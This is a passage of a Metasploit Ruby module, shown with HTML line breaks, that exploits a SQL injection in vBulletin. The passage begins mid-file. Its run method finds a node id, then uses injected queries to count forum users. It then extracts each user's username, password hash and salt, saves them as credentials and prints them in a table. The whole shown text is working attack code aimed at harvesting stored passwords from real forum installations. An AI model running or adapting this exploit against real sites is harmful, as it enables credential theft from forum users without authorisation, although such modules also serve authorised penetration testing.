/> end<br /><br /> def report_cred(opts)<br /> service_data = {<br /> address: opts[:ip],<br /> port: opts[:port],<br /> service_name: opts[:service_name],<br /> protocol: 'tcp',<br /> workspace_id: myworkspace_id<br /> }<br /><br /> credential_data = {<br /> origin_type: :service,<br /> module_fullname: fullname,<br /> username: opts[:user],<br /> private_data: opts[:password],<br /> private_type: :nonreplayable_hash,<br /> jtr_format: 'md5'<br /> }.merge(service_data)<br /><br /> login_data = {<br /> core: create_credential(credential_data),<br /> status: Metasploit::Model::Login::Status::UNTRIED,<br /> proof: opts[:proof]<br /> }.merge(service_data)<br /><br /> create_credential_login(login_data)<br /> end<br /><br /> def run<br /> print_status("Checking for a valid node id...")<br /> node_id = get_node<br /> if node_id.nil?<br /> print_error("node id not found")<br /> return<br /> end<br /><br /> print_good("Using node id #{node_id} to exploit sqli... Counting users...")<br /> data = do_sqli(node_id, "select count(*) from user")<br /> if data.blank?<br /> print_error("Error exploiting sqli")<br /> return<br /> end<br /> count_users = data.to_i<br /> print_good("#{count_users} users found. Collecting credentials...")<br /><br /> users_table = Rex::Text::Table.new(<br /> 'Header' => 'vBulletin Users',<br /> 'Indent' => 1,<br /> 'Columns' => ['Username', 'Password Hash', 'Salt']<br /> )<br /><br /> for i in 0..count_users<br /> user = get_user_data(node_id, i)<br /> unless user.join.empty?<br /> report_cred(<br /> ip: rhost,<br /> port: rport,<br /> user: user[0],<br /> password: user[1],<br /> service_name: (ssl ? "https" : "http"),<br /> proof: "salt: #{user[2]}"<br /> )<br /> users_table << user<br /> end<br /> end<br /><br /> if users_table.rows.length > 0<br /> print_good("#{users_table.rows.length.to_s} credentials successfully collected")<br /> print_line(users_table.to_s)<br /> else<br /> print_error("Unfortunately the module was unable to extract any credentials")<br /> end<br /> end<br /><br /><br />end<br /><br /></code></pre>